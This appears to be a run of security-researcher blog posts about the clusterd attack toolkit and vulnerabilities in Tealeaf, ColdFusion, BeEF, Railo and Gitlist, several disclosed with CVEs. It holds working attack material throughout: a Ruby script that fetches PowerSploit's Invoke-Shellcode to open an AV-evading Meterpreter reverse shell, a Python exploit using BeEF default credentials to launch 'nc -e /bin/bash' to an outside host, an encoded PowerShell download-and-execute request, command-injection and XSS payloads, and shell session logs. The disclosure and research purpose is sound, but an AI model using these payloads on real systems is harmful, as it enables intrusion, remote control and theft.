This isn’t a real introduction post, just a note that I’m migrating from Google Blogger to Github Pages with Octopress. So far it’s great. I’m going to be slowly migrating all posts over from Blogger into here, though I may skip a few early posts that aren’t as interesting.
Hopefully it provides me with the functionality that I’ve been looking for.
One of my primary goals during development of clusterd was ensuring reliability and covertness during remote deploys. It’s no secret that antivirus routinely eats vanilla Meterpreter shells. To that end, the --gen-payload flag generates a WAR file with java/jsp_shell_reverse_tcp tucked inside; this payload remains largely undetected by AV, and the environments clusterd targets are perfectly suited for it. Still, Meterpreter is a fantastic piece of software, and it’d be nice to be able to elevate from this simple JSP shell into it.
Metasploit has a solution for this, sort of. sessions -u can be used to upgrade an existing shell session into a full-blown Meterpreter. Unfortunately, the current implementation uses Rex::Exploitation::CmdStagerVBS, which writes the executable to disk and executes it. This is almost always immediately popped by enterprise-grade (and even most consumer-grade) AVs, so we need a new approach.
The easiest solution is Powershell, which allows us to execute shellcode completely in memory without ever touching disk. I used Obscure Security’s canonical post on the technique for my implementation. The only real problem is portability, as Powershell doesn’t exist on Windows XP. This could be mitigated by patching in shellcode via Java, but that’s another post for another time.
Right, so how does this work? We essentially execute a Powershell command in the running session (our generic shell) that fetches a payload from a remote server and executes it. Our payload in this case is Invoke-Shellcode, from the PowerSploit package. This bit of code will generate our reverse HTTPS Meterpreter shell and inject it into the current process. Our command looks like this:
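(Reconstructed from the generate() helper in the script below; HOST and SPORT are placeholders for the attacker’s address and the port serving Invoke-Shellcode.)

cmd.exe /c PowerShell.exe -Exec ByPass -Nol iex (New-Object Net.WebClient).DownloadString('http://HOST:SPORT/')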
IEX, or Invoke-Expression, is just an eval operation. In this case, we’re fetching a URL and executing it. This is a totally transparent, completely in-memory solution. Let’s have a look at it running:
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 192.168.1.6:4444 -> 192.168.1.102:60911 (192.168.1.102)
msf exploit(handler) >
We see above that we currently have a generic shell (it’s the java/jsp_shell_reverse_tcp payload) on a Windows 7 system (which happens to be running MSE). Using this new script, we can upgrade this session to Meterpreter:
msf exploit(handler) > sessions -u 1
[*] Started HTTPS reverse handler on https://0.0.0.0:53568/
[*] Starting the payload handler...
[*] 192.168.1.102:60922 Request received for /INITM...
[*] 192.168.1.102:60922 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 2 opened (192.168.1.6:53568 -> 192.168.1.102:60922) at 2014-03-11 23:09:36 -0600
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : BRYAN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter >
And just like that, without a peep from MSE, we’ve got a Meterpreter shell.
You can find the code for this implementation below, though be warned: this is PoC-quality code, and probably worse than that, as I’m not really a Ruby developer. Meatballs over at Metasploit has a few awesome Powershell pull requests waiting for a merge; once those land, I can use them here and submit a proper implementation. If you’d like to try this out, simply create a backup copy of scripts/shell/spawn_meterpreter.rb, copy in the following, then reload. You should be upgradin’ and bypassin’ in no time.
#
# Session upgrade using Powershell IEX
#
# Some code stolen from jduck's original implementation
#
# -drone
#
class HTTPServer
  #
  # Using Ruby HTTPServer here since this isn't a module, and I can't figure
  # out how to use MSF libs in here
  #
  @sent = false

  def state
    return @sent
  end

  def initialize(port, body)
    require 'socket'
    @sent = false
    @server = Thread.new do
      server = TCPServer.open port
      loop do
        client = server.accept
        content_type = "text/plain"
        client.puts "HTTP/1.0 200 OK\r\nContent-type: #{content_type}"\
                    "\r\nContent-Length: #{body.length}\r\n\r\n#{body}"\
                    "\r\n\r\n"
        sleep 5
        client.close
        kill
      end
    end
  end

  def kill!
    @sent = true
    @server.kill
  end
  alias :kill :kill!
end
#
# Returns if a port is used by a session
#
def is_port_used?(port)
  framework.sessions.each do |sid, obj|
    local_info = obj.instance_variable_get(:@local_info)
    return true if local_info =~ /:#{port}$/
  end
  false
end

def start_http_service(port)
  @server = HTTPServer.new(port, @pl)
end

def wait_payload
  waited = 0
  while (not @server.state)
    select(nil, nil, nil, 1)
    waited += 1
    if (waited > 10) # MAGIC NUMBA
      @server.kill
      raise RuntimeError, "No payload requested"
    end
  end
end

def generate(host, port, sport)
  require 'net/http'
  script_block = "iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')" % [host, sport]
  cmd = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol %s" % script_block

  # generate powershell payload
  url = URI.parse('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
  req = Net::HTTP::Get.new(url.path)
  http = Net::HTTP.new(url.host, url.port)
  http.use_ssl = true
  res = http.request(req)

  if !res or res.code != '200'
    raise RuntimeError, "Could not retrieve Invoke-Shellcode"
  end

  @pl = res.body
  @pl << "\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force" % [host, port]
  return cmd
end
#
# Mimics what MSF already does if the user doesn't manually select a payload and lhost
#
lhost = framework.datastore['LHOST']
unless lhost
  lhost = Rex::Socket.source_address
end

#
# If there is no LPORT defined in framework, then pick a random one that's not used
# by current sessions. This is possible if the user assumes module datastore options
# are the same as framework datastore options.
#
lport = framework.datastore['LPORT']
unless lport
  lport = 4444 # Default meterpreter port
  while is_port_used?(lport)
    # Pick a port that's not used
    lport = [*49152..65535].sample
  end
end

# do the same from above, but for the server port
sport = [*49152..65535].sample
while is_port_used?(sport)
  sport = [*49152..65535].sample
end

# maybe we want our sessions going to another instance?
use_handler = true
use_handler = nil if (session.exploit_datastore['DisablePayloadHandler'] == true)
#
# Spawn the handler if needed
#
aborted = false
begin
  mh = nil
  payload_name = 'windows/meterpreter/reverse_https'

  if (use_handler)
    mh = framework.modules.create("exploit/multi/handler")
    mh.datastore['LPORT'] = lport
    mh.datastore['LHOST'] = lhost
    mh.datastore['PAYLOAD'] = payload_name
    mh.datastore['ExitOnSession'] = false
    mh.datastore['EXITFUNC'] = 'process'
    mh.exploit_simple(
      'LocalInput'  => session.user_input,
      'LocalOutput' => session.user_output,
      'Payload'     => payload_name,
      'RunAsJob'    => true)

    # It takes a little time for the resources to get set up, so sleep for
    # a bit to make sure the exploit is fully working. Without this,
    # mod.get_resource doesn't exist when we need it.
    select(nil, nil, nil, 0.5)

    if framework.jobs[mh.job_id.to_s].nil?
      raise RuntimeError, "Failed to start multi/handler - is it already running?"
    end
  end

  # Generate our command and payload
  cmd = generate(lhost, lport, sport)

  # start http service
  start_http_service(sport)
  sleep 2 # give it a sec to startup

  # execute command
  session.run_cmd(cmd)

  if not @server.state
    # wait...
    wait_payload
  end
rescue ::Interrupt
  # TODO: cleanup partial uploads!
  aborted = true
rescue => e
  print_error("Error: #{e}")
  aborted = true
end

#
# Stop the job
#
if (use_handler)
  Thread.new do
    if not aborted
      # Wait up to 10 seconds for the session to come in..
      select(nil, nil, nil, 10)
    end
    framework.jobs.stop_job(mh.job_id)
  end
end
Update 09/06/2014
Tom Sellers submitted a PR on 05/29 that implements the above nicely. It appears to support a large swath of platforms, though only a couple of the methods avoid writing to disk, namely the Powershell one.
Tealeaf Technologies was purchased by IBM in May of 2012; its product is a customer buying-analytics application. Essentially, an administrator configures a Tealeaf server that accepts analytics data from remote servers and then generates various models, graphs, and reports based on the aggregated data.
Their analytics status/server monitoring application is vulnerable to a fairly trivial OS command injection, as well as local file inclusion (LFI). These were discovered on a PCI engagement against a large retailer; the LFI was used to pull PHP files and hunt for RCE.
The entire application is served up by default on port 8080 and is developed in PHP. Authentication is disabled by default, though support for Basic Auth appears to exist. This interface allows administrators access to statistics, logs, participating servers, and more. Contained therein is the ability to obtain application logs, such as configuration, maintenance, and access logs. The log parameter is vulnerable to LFI:
if(array_key_exists("log", $params))
$path = $config->logfiledir() . "/" . $params["log"];
$file = basename($path);
$size = filesize($path);
// Set the cache-control and expiration date so that the file expires
// immediately after download.
//
$rfc1123date = gmdate('D, d M Y H:i:s T', 1);
header('Cache-Control: max-age=0, must-revalidate, post-check=0, pre-check=0');
header("Expires: " . $rfc1123date);
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$file;");
header("Content-Length: $size;");
readfile($path);
The URL then is http://host:8080/download.php?log=../../../etc/passwd
Tealeaf also suffers from a rather trivial remote OS command injection vulnerability. Under the Delivery tab, there exists the option to ping remote servers that send data back to the mothership. Do you see where this is going?
function shell_command_output($command) {
    $result = `$command 2>&1`;
    if (strlen($result) > 0)
        return $result;
}
Harnessing the $host variable, we can inject arbitrary commands to run under the context of the process user, which by default is ctccap. In order to exploit this without hanging processes or goofing up flow, I injected the following as the host variable: 8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1.
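For reference, driving that injection boils down to something like the following sketch; the endpoint path and parameter name here are placeholders, since the real request is simply whatever the Delivery tab’s ping feature submits:

import requests

# Hypothetical endpoint/parameter names; substitute whatever the ping feature actually sends.
target = "http://192.168.1.219:8080"
payload = "8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1"

r = requests.get(target + "/ping.php", params={"host": payload})
print(r.text)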
Timeline
11/08/2013: IBM vulnerability submitted
11/09/2013: IBM acknowledges vulnerability and assigns internal advisory ID
12/05/2013: Request for status update
01/06/2014: Second request for status update
01/23/2014: IBM responds with a target patch date set for “another few months”
03/26/2014: IBM posts advisory, assigns CVE-2013-6719 and CVE-2013-6720
ColdFusion has several very popular LFIs that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser-known use of these LFIs, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?
The less-than-obvious solution is to exploit CFML’s parser, which behaves much like PHP does when embedded in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code; this is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFIs to inject CFML and execute it on the remote system.
Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as an example. CF8’s LFI lies in the locale parameter:
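A typical request looks something like this (the traversal depth and log path are assumptions based on a default Windows ColdFusion 8 layout, so adjust for the target):

http://host/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\ColdFusion8\logs\application.log%00en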
When exploited, this will dump the contents of application.log, a logging file that stores error messages.
We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any characters we want, including CFML code.
The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:
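Something along these lines does the trick (a sketch; BASE64_URL stands in for the base64-encoded URL of the real payload, and the exact attributes may differ slightly from what I originally used):

<cfhttp method="get" url="#ToString(ToBinary('BASE64_URL'))#" path="#ExpandPath('../../')#" file="cmd.cfml">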
The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64’d to avoid some encoding issues with forward slashes. We then expand the local path to ../../, which drops us into wwwroot, the first directory accessible from the web server.
Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:
Which we can then access from the root directory:
A quick run of this in clusterd:
$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml
clusterd/0.2.1 - clustered attack toolkit
[Supporting 5 platforms]
[2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
[2014-04-02 11:28PM] Servers' OS hinted at windows
[2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
[2014-04-02 11:28PM] Server hinted at 'coldfusion'
[2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
[2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
[2014-04-02 11:28PM] ColdFusion Manager (version 8.0)
[2014-04-02 11:28PM] Fingerprinting completed.
[2014-04-02 11:28PM] Injecting stager...
[2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
[2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
[2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM
The downside to this method is the remnants left in a log file, which cannot be purged unless the CF server is shut down (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand, that is, one that checks whether an argument is provided to the LFI and only parses and executes then.
A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.
Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03/02/2014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I’ve seen too many penetration testers leaving their tools externally exposed, often with default credentials.
The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.
The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:
# Adds a new DNS rule
post '/rule' do
  begin
    body = JSON.parse(request.body.read)

    pattern = body['pattern']
    type = body['type']
    response = body['response']

    # Validate required JSON keys
    unless [pattern, type, response].include?(nil)
      # Determine whether 'pattern' is a String or Regexp
      begin
        pattern_test = eval pattern
        pattern = pattern_test if pattern_test.class == Regexp
        # end
      rescue => e;
      end
The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:
import requests
import json
import sys

def fetch_default(ip):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'username' : 'beef', 'password' : 'beef' }
    response = requests.post(url, headers=headers, data=json.dumps(data))
    if response.status_code == 200 and json.loads(response.content)['success']:
        return json.loads(response.content)['token']

try:
    ip = '192.168.1.6'
    if len(sys.argv) > 1:
        token = sys.argv[1]
    else:
        token = fetch_default(ip)

    if not token:
        print 'Could not get auth token'
        sys.exit(1)

    url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
    sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'pattern' : sploit,
             'type' : 'A',
             'response' : [ '127.0.0.1' ] }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code
except Exception, e:
    print e
You could execute ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).
There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:
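The bind request itself looks something like the sketch below; note that the JSON keys here are assumptions for illustration, so check the handler’s source for the exact names it expects:

import requests
import json

ip, token = '192.168.1.6', 'TOKEN_FROM_LOGIN'
url = 'http://%s:3000/api/server/bind?token=%s' % (ip, token)
headers = { 'Content-Type' : 'application/json; charset=UTF-8' }

# 'mount_path' and 'local_file' are assumed parameter names, not confirmed against the BeEF source
data = { 'mount_path' : '/tmp.txt',
         'local_file' : '../../../../etc/passwd' }

print(requests.post(url, headers=headers, data=json.dumps(data)).status_code)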
We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.
Railo is an open-source alternative to the popular Coldfusion application server, implementing a FOSSy CFML engine and application server. It emulates Coldfusion in a variety of ways, with many features coming straight from the CF world, along with several unique features of its own (clustered servers, a plugin architecture, etc). In this four-part series, we’ll touch on how Railo, much like Coldfusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I’ll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).
I’ll preface this post with a quick rundown on what we’re working with: public versions of Railo run from 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; many of this post’s code samples have been taken from the 4.2 branch or master. Hashes:
Railo has two separate administrative web interfaces; server and web. The two interfaces segregate functionality out into these categories; managing the actual server and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.
Authentication
As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):
<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
<cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
<cfelse>
A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:
That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric-key security is dependent upon the secrecy of this shared key.
To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):
<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
<cfset fromCookie=true>
<cftry>
<cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
<cfcatch></cfcatch>
</cftry>
</cfif>
For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:
This would dump my plaintext password (which, in this case, is “default”). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT
Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:
In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:
<cfdump var="#session#">
We then set the template handler to this file:
If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:
XSS
XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?
Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.
Post-authentication search:
Malicious input submitted to the search bar has its greater-than/less-than signs sanitized in the reflected output, but not inside the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop up the cookie.
How about stored XSS?
A malicious mapping will trigger whenever the page is loaded; the only caveats are that the path must start with a /, and you cannot use the script tag. That’s trivial to get around with any number of different tags.
Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:
public static final String[] invalids=new String[]{
"object", "embed", "script", "applet", "meta", "iframe"
};
They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:
It doesn’t take much to evade this filter, as I’ve already described.
CSRF kinda fits in here, so how about it? Fortunately for users, and unfortunately for pentesters, there’s not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:
In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.
Deploying
Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:
$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default
clusterd/0.2.1 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
[2014-05-01 10:04PM] Servers' OS hinted at windows
[2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
[2014-05-01 10:04PM] Server hinted at 'railo'
[2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
[2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
[2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
[2014-05-01 10:04PM] Matched 3 fingerprints for service railo
[2014-05-01 10:04PM] Railo Server (version 4.1)
[2014-05-01 10:04PM] Railo Server Administrator (version 4.1)
[2014-05-01 10:04PM] Railo Web Administrator (version 4.1)
[2014-05-01 10:04PM] Fingerprinting completed.
[2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000). Continue? [Y/n] >
[2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
[2014-05-01 10:04PM] Creating scheduled task...
[2014-05-01 10:04PM] Task cmd.cfml created, invoking...
[2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
[2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
[2014-05-01 10:04PM] Cleaning up...
[2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM
This works almost identically to the Coldfusion scheduler, and should not be surprising.
One feature Railo has that isn’t found in Coldfusion is the Extension or Plugin architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.
Railo allows extensions to be uploaded directly to the server, found here:
Developing a plugin is sort of confusing and not exactly clear from their provided Github documentation; the simplest way to do it is to grab a pre-existing package and simply replace one of its functions with a shell.
That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.
Gitlist is a fantastic repository viewer for Git; it’s essentially your own private Github without all the social networking and glitzy features. I’ve got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:
Oops! sh: 1: Syntax error: EOF in backquote substitution
I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.
The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:
This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.
The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):
With these restrictions in mind, we can begin crafting our payload.
My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:
cd /var/www/gitlist
mkdir cache
chmod 777 cache
This is perfect; we have a reliable location with 777 permissions, and it’s accessible from the web root (/gitlist/cache/my_shell.php). The second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:
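Roughly like this (a sketch; BASE64_PHP_SHELL is your base64-encoded PHP shell, and the exact quoting depends on how the branch name gets interpolated into the shell command):

git checkout -b '`echo${IFS}BASE64_PHP_SHELL|base64${IFS}-d>/var/www/gitlist/cache/shell.php`'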
In order to inject PHP we need the <? and ?> markers, so we must encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to stand in for our spaces, echo the base64’d shell into base64 for decoding, and pipe the result into our payload location.
And it works flawlessly.
You might say, “Hey, if you have commit access it’s game over,” but I’ve seen several instances where this is not the case. Commit access does not necessarily equate to shell access.
The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:
Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:
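If memory serves, the request ended up looking something like the following (the exact route and repository name will vary, so treat this as an approximation):

http://host/gitlist/my_repo.git/blame/master/""`whoami`""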
This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, like ColdFusion, there is a task scheduler that allows authenticated users to write local files. While this feature is the standard way to shell a Railo box, sometimes it may not work: in the event of stringent firewall rules or irregular file permissions, or when you’d just prefer not to make remote connections, the techniques explored in this post will help.
PHP has an interesting, ahem, feature, where it writes session information out to a temporary file located in a designated path. If this file is accessible to an attacker, PHP data can be injected into it via several different vectors, such as a User-Agent header or some function of the application itself. Railo does sort of the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP, however, the name of the file is not simply the session ID, but rather a quasi-unique value generated using a mixture of pseudo-random and predictable/leaked information. I’ll dive into this in a bit.
When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is then either created, or an existing one is used, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, these files will be parsed by the CFML interpreter looking for CF tags, much like PHP will do. A typical request to add a new bookmark is as follows:
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1
The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:
Whilst our injected data is written to the file, astute readers will note the double # around our Coldfusion variable. This is ColdFusion’s way of escaping a number sign, and will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.
We have two options for popping this: inject a command that returns a shell, or inject a web shell that simply writes output to a file accessible from the web root. I’ll start with the easier of the two, which is injecting a command to return a shell.
I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1
Once injected, we hit our session page and pop a shell:
payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600
meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer : BRYAN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter >
Because I’m using Powershell, this method won’t work on Windows XP or Linux systems, but it’s trivial to use the next method for those (net user/useradd).
The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:
':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'
Note that we’re writing out to the start of the web root and that our output file is a CFM; this is a requirement, as the web server won’t serve up flat or .txt files.
Great, we’ve verified this works. Now, how do we actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.
We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root; that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.
When a favorite is saved, internal.savedata.cfm is invoked and searches through the given list for the function we’re performing:
This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is “how is the file name determined?”, so naturally we need to head into loadData:
At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.
I’ll skip some of the digging here, but let’s fast-forward to Admin.java:
Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:
@Override
public String getId() {
    if(id==null){
        id = getId(getSecurityKey(), getSecurityToken(), false, securityKey);
    }
    return id;
}
